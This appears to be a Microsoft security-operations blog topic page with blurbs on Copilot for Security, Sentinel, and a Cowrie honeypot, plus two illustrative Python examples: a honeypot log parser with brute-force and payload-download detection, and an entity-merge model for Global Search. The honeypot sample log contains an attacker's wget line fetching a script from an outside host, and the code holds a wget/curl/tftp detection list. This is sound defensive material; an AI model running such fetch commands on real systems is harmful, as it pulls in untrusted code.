Security Operations
33 Topics

How to Become a Microsoft Security Copilot Ninja: The Complete Level 400 Training
Learn how to become a Microsoft Security Copilot (Copilot) Ninja! This blog will walk you through the resources you'll need to master and make best use of Microsoft's Security Copilot product.

Use Azure DevOps to manage Sentinel for MSSPs and Multi-tenant Environments
Automate Sentinel resource deployment in multi-tenant scenarios using Azure DevOps and Sentinel Repositories. Enable version control, collaboration, and streamlined updates for consistent and secure configurations.

Identity forensics with Copilot for Security Identity Analyst Plugin
Microsoft Copilot for Security is a platform that brings together the power of AI and human expertise to help administrators and security teams respond to attacks faster and more effectively. Copilot for Security is embedded in Microsoft Entra so you can investigate and resolve identity risks, assess identities and access with AI-driven intelligence, and complete complex tasks quickly. Microsoft Copilot in Microsoft Entra draws its insights from your Microsoft Entra users, groups, sign-in logs, audit logs, and more. You can explore sign-ins and risky users in natural language and get contextualized guidance on how to resolve incidents and how to protect the affected accounts. Built on real-time machine learning, Copilot in Microsoft Entra can help you find gaps in access policies, generate identity workflows, and troubleshoot faster. You can also unlock new skills that let admins at all levels complete complex tasks such as incident investigation and sign-in log analysis, saving time and resources.

Cowrie honeypot and its Integration with Microsoft Sentinel
A honeypot is a security mechanism designed to attract, detect, and analyze attackers and their activity by simulating a vulnerable system or network service. Its primary purpose is to provide a controlled environment where security professionals can observe and study attack methods, tools, and behaviors without putting production systems at risk. Integrating the Cowrie honeypot (an SSH and Telnet honeypot that records login attempts, the credentials tried, and the commands attackers run) with Microsoft Sentinel brings several benefits for security operations. Microsoft Sentinel is a cloud-native Security Information and Event Management (SIEM) service that provides intelligent security analytics and threat intelligence across the enterprise. By combining Cowrie's detailed honeypot data with Sentinel's analytics and automation capabilities, organizations can achieve a more comprehensive and effective security posture. The integration covers custom parsers, analytics rules, threat hunting, automation, and workbooks.

Level Up Your Security Skills with the New Microsoft Sentinel Ninja Training!
If you've explored our Microsoft Sentinel Ninja Training in the past, it's time to revisit! The training program has undergone some exciting changes to keep you ahead of the curve in the ever-evolving cybersecurity landscape. Microsoft Sentinel is a cloud-native SIEM and SOAR solution designed to help security professionals protect their organizations from today's complex threats, and the Ninja Training program guides you through every aspect of it. So, what's new? In addition to the structured security-roles format, the Ninja Training now offers a more interactive experience with updated modules, hands-on labs, and real-world scenarios. Whether you're focusing on threat detection, incident response, or automation, the training ensures you gain the practical skills needed to optimize your security operations. One of the biggest updates is the integration of Sentinel into the Defender XDR portal, creating a unified security platform. This merger simplifies workflows, speeds up incident response, and minimizes tool-switching. Other highlights include step-by-step guidance through the official Microsoft Sentinel documentation, plus exclusive webinars and up-to-date blog posts from Microsoft experts. If you're ready to take your Sentinel skills to the next level or want to revisit the program's new features, head over to the blog now and dive into the refreshed Microsoft Sentinel Ninja Training!

What's New: Global Search in the Unified Security Operations platform includes Sentinel users and devices
We are thrilled to announce a significant enhancement to our Unified Security Operations (SecOps) platform. The Global Search feature in the Defender XDR portal now supports searching for Microsoft Sentinel users and devices, providing a more comprehensive and unified search experience for customers using Microsoft's Unified Security Operations platform. This feature lets you search for devices, users, and other information by typing full or partial search terms. With this update, you can search for Microsoft Sentinel entities directly within the Unified Security Operations platform, streamlining your workflow and improving efficiency.

Key Benefits

Unified Search Results: Microsoft Sentinel devices and users are now merged with Microsoft Defender XDR portal entities, providing a single, unified search result. This eliminates the need to switch between different tools.
Increased Efficiency and Time Saving: The ability to search across Sentinel incidents and other data in the Defender portal cuts down investigation time, leading to faster resolution of security incidents.
Comprehensive Identifier Support: The search supports various identifiers, ensuring that devices and users from Microsoft Sentinel and Defender with matching identifiers are merged into a single result. This includes identifiers such as HostName, NTDomain, DnsDomain, and NetBiosName.
Improved User Experience: The integration simplifies the search experience, making it easier for security professionals to find the information they need quickly.

This enhancement is part of our ongoing effort to consolidate Microsoft Sentinel entities within the comprehensive XDR+SIEM platform.

How to Get Started

Getting started with the Global Search feature is simple:
1. Access the Microsoft Defender XDR portal: Log in to the Microsoft Defender XDR portal using your credentials.
2. Navigate to Global Search: Locate the Global Search bar at the top of the portal.
3. Enter search terms: Type the full or partial search terms for the device or user you are looking for. The search now includes Sentinel entities along with Defender entities.
4. Review unified results: The search results display a unified view of Microsoft Sentinel and Defender entities, allowing you to quickly find the information you need.

Use Cases and Scenarios

Incident Investigation: An analyst can use Global Search to quickly find all affected devices related to an incident, which makes it easier to establish the scope of the issue and prioritize the appropriate response.
Threat Hunting: Threat hunters can use Global Search to locate suspicious user activity or specific files that have been flagged as malicious, correlating these findings with other related alerts in the system.
Device Tracking: Security teams can use Global Search to track a compromised device, checking for alerts, users associated with the device, and any incidents that might involve it.

Supported Sentinel Host Identifiers

Sentinel devices with the following strong identifiers can be searched and merged with Defender devices with matching identifiers:
HostName + NTDomain
HostName + DnsDomain
NetBiosName + NTDomain
NetBiosName + DnsDomain

Note that every combination pairs a host name with a domain: a bare HostName or NetBiosName on its own is not a strong identifier and will not cause a Sentinel device to be merged with a Defender device.

Supported Account Identifiers

Sentinel accounts with the following strong identifiers can be merged with Defender users with matching identifiers:
Name + UPNSuffix
AADUserId
Sid

Moving Forward with Global Search

With Global Search for Sentinel entities now available in the Microsoft Defender XDR portal, organizations can significantly enhance their security operations. This feature gives security teams the tools they need to efficiently search, investigate, and respond to threats, all from a single interface. By bringing together a unified search across incidents, alerts, users, devices, and files, the Global Search feature streamlines threat hunting, investigation, and response workflows.
This ultimately helps organizations stay ahead of evolving threats and ensures they have the necessary context to protect their environment effectively. For more detailed information and documentation on how to use Global Search, see the official Microsoft 365 Defender portal documentation.

Case Study: Harnessing Copilot for Security in Defending Against Cyberthreats
Get ready to dive into a real-life security incident within Microsoft Defender XDR! In this case study, you'll take on the role of a security analyst and uncover how Copilot for Security can empower you throughout the investigation. Let's see how you can tackle cyber threats head-on!
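As an added illustration of the custom-parser and analytics-rule side of the "Cowrie honeypot and its Integration with Microsoft Sentinel" entry above, the following Python is example code written for this page; it is neither Cowrie's nor Microsoft's code, and it is not a substitute for a Sentinel KQL parser or analytics rule. Cowrie writes one JSON object per line, and the block parses such lines, skips anything that is not a well-formed event, groups events by session, flags shell input that fetches a payload, and runs a sliding-window brute-force rule over failed logins. The event IDs and field names (cowrie.login.failed, cowrie.login.success, cowrie.command.input, src_ip, session, username, password, input) are Cowrie's JSON log conventions as this editor knows them; the log lines, addresses, session IDs, threshold, window, download-command heuristic and function names are all constructed for this example.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Cowrie's JSON log, one event per line. The eventid values and
# field names follow Cowrie's JSON output; the addresses, session IDs, credentials and
# the non-JSON line are invented for this example.
SAMPLE_COWRIE_LOG = """\
{"eventid":"cowrie.session.connect","timestamp":"2024-05-01T10:00:00.000000Z","src_ip":"203.0.113.7","src_port":51000,"dst_port":2222,"session":"a1b2c3d4e5f6","protocol":"ssh"}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T10:00:01.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T10:00:02.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","username":"root","password":"admin"}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T10:00:03.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","username":"root","password":"password"}
{"eventid":"cowrie.login.success","timestamp":"2024-05-01T10:00:04.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","username":"root","password":"toor"}
{"eventid":"cowrie.command.input","timestamp":"2024-05-01T10:00:05.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","input":"uname -a"}
{"eventid":"cowrie.command.input","timestamp":"2024-05-01T10:00:06.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","input":"wget http://198.51.100.9/x.sh -O /tmp/x.sh"}
{"eventid":"cowrie.session.closed","timestamp":"2024-05-01T10:00:07.000000Z","src_ip":"203.0.113.7","session":"a1b2c3d4e5f6","duration":7.0}
{"eventid":"cowrie.login.failed","timestamp":"2024-05-01T10:30:00.000000Z","src_ip":"198.51.100.23","session":"0f0f0f0f0f0f","username":"admin","password":"admin"}
this line is not JSON and a robust parser must skip it
"""

# Command prefixes that usually mean the intruder is staging a payload (example heuristic).
DOWNLOAD_PREFIXES = ("wget ", "curl ", "tftp ")


def parse_cowrie_events(text):
    """Parse line-delimited Cowrie JSON, dropping lines that are not well-formed events."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or foreign line: never let it abort the whole batch
        if isinstance(event, dict) and "eventid" in event and "timestamp" in event:
            events.append(event)
    return events


def _event_time(event):
    # Cowrie stamps events in UTC with a trailing Z, which fromisoformat wants as +00:00.
    return datetime.fromisoformat(event["timestamp"].replace("Z", "+00:00"))


def summarize_sessions(events):
    """Group events by Cowrie session id: source, failed attempts, accepted credentials, commands."""
    sessions = {}
    for event in events:
        sid = event.get("session")
        if sid is None:
            continue
        s = sessions.setdefault(sid, {"src_ip": event.get("src_ip"), "failed": 0,
                                      "credentials": None, "commands": []})
        eid = event["eventid"]
        if eid == "cowrie.login.failed":
            s["failed"] += 1
        elif eid == "cowrie.login.success":
            s["credentials"] = (event.get("username"), event.get("password"))
        elif eid == "cowrie.command.input":
            s["commands"].append(event.get("input", ""))
    return sessions


def flag_download_commands(sessions):
    """Return {session_id: [commands]} for sessions whose shell input fetched something."""
    flagged = {}
    for sid, s in sessions.items():
        hits = [c for c in s["commands"] if c.lstrip().startswith(DOWNLOAD_PREFIXES)]
        if hits:
            flagged[sid] = hits
    return flagged


def detect_bruteforce(events, threshold=3, window=timedelta(minutes=5)):
    """Sliding-window rule: `threshold` failed logins from one src_ip within `window` raises one alert."""
    failures = defaultdict(list)
    for event in events:
        if event["eventid"] == "cowrie.login.failed" and "src_ip" in event:
            failures[event["src_ip"]].append(_event_time(event))
    alerts = []
    for src_ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({"src_ip": src_ip, "failed_logins": end - start + 1,
                               "window_start": times[start].isoformat(),
                               "window_end": t.isoformat()})
                break  # one alert per source per batch; the SIEM can aggregate further
    return alerts


if __name__ == "__main__":
    evs = parse_cowrie_events(SAMPLE_COWRIE_LOG)
    print("brute-force alerts:", detect_bruteforce(evs))
    print("download commands:", flag_download_commands(summarize_sessions(evs)))
```

The three outputs map onto the Sentinel artifacts the entry names: the brute-force alert is what an analytics rule would raise, the per-session summary is what a workbook would chart, and the download-command list is a hunting query seed. The same thresholds would be expressed in KQL over the ingested custom table in Sentinel itself.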
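To make the strong-identifier merge listed under "Supported Sentinel Host Identifiers" and "Supported Account Identifiers" in the Global Search entry above concrete, here is an added example in Python that models it. This is illustrative code written for this page, not Microsoft's implementation, whose internals the post does not describe. A Defender record absorbs a Sentinel entity only when both carry the same value for one of the listed identifier combinations, compared case-insensitively; a Sentinel host with only a bare HostName has no strong key and stays a separate result, although a partial-term search still finds it. The identifier names are the ones the post lists; the sample entities, the DeviceId field, the GUID and SID values, and all function names are constructed for this example.

```python
# Identifier combinations the post lists as strong enough to merge Sentinel and Defender entities.
HOST_STRONG_KEYS = [("HostName", "NTDomain"), ("HostName", "DnsDomain"),
                    ("NetBiosName", "NTDomain"), ("NetBiosName", "DnsDomain")]
ACCOUNT_STRONG_KEYS = [("Name", "UPNSuffix"), ("AADUserId",), ("Sid",)]

# Constructed sample entities: identifier names come from the post, every value and the
# DeviceId field are invented for this example.
DEFENDER_DEVICES = [
    {"HostName": "FS01", "NTDomain": "CORP", "DnsDomain": "corp.contoso.com", "DeviceId": "dev-001"},
    {"HostName": "WS02", "NetBiosName": "WS02", "DnsDomain": "corp.contoso.com", "DeviceId": "dev-002"},
]
SENTINEL_HOSTS = [
    {"HostName": "fs01", "NTDomain": "corp"},                  # merges via HostName + NTDomain
    {"NetBiosName": "ws02", "DnsDomain": "corp.contoso.com"},  # merges via NetBiosName + DnsDomain
    {"HostName": "fs01"},                                      # no domain: no strong key, stays separate
]
DEFENDER_USERS = [
    {"Name": "alice", "UPNSuffix": "contoso.com", "AADUserId": "0f4c4b1e-2c3d-4e5f-8a9b-0c1d2e3f4a5b"},
]
SENTINEL_ACCOUNTS = [
    {"AADUserId": "0f4c4b1e-2c3d-4e5f-8a9b-0c1d2e3f4a5b",
     "Sid": "S-1-5-21-1004336348-1177238915-682003330-1104"},  # merges via AADUserId, contributes Sid
    {"Name": "Alice", "UPNSuffix": "CONTOSO.COM"},              # merges via Name + UPNSuffix, case-insensitive
]


def strong_keys(entity, key_sets):
    """All (identifier combination, normalized values) keys this entity can be matched on.
    An entity missing any field of a combination gets no key for that combination."""
    keys = set()
    for fields in key_sets:
        values = [entity.get(f) for f in fields]
        if all(values):
            keys.add((fields, tuple(str(v).casefold() for v in values)))
    return keys


def merge_entities(sentinel_entities, defender_entities, key_sets):
    """Fold Sentinel entities into Defender entities that share at least one strong key.

    Returns merged records of the form {"sources": [...], "fields": {...}, "keys": {...}}.
    Defender records are created first, so their field values win on conflict. A Sentinel
    entity with no strong key, or whose keys match nothing, becomes its own record."""
    index = {}   # strong key -> merged record
    merged = []
    for source, entities in (("Defender", defender_entities), ("Sentinel", sentinel_entities)):
        for entity in entities:
            keys = strong_keys(entity, key_sets)
            record = next((index[k] for k in keys if k in index), None)
            if record is None:
                record = {"sources": [], "fields": {}, "keys": set()}
                merged.append(record)
            record["sources"].append(source)
            for name, value in entity.items():
                record["fields"].setdefault(name, value)
            record["keys"] |= keys
            for k in keys:
                index[k] = record  # later entities carrying this key land on the same record
    return merged


def global_search(term, records):
    """Case-insensitive full-or-partial match over every field value of each merged record."""
    needle = term.casefold()
    return [r for r in records
            if any(needle in str(v).casefold() for v in r["fields"].values())]


if __name__ == "__main__":
    hosts = merge_entities(SENTINEL_HOSTS, DEFENDER_DEVICES, HOST_STRONG_KEYS)
    for rec in hosts:
        print(rec["sources"], rec["fields"])
    print("search 'fs01':", [r["fields"] for r in global_search("fs01", hosts)])
```

The third Sentinel host is the case worth noticing: it shares a HostName with a Defender device, yet without a domain component it never merges, so a search for "fs01" returns two results. That is the behaviour the identifier lists above imply, and it is why Sentinel data sources should populate a domain field on host entities wherever they can.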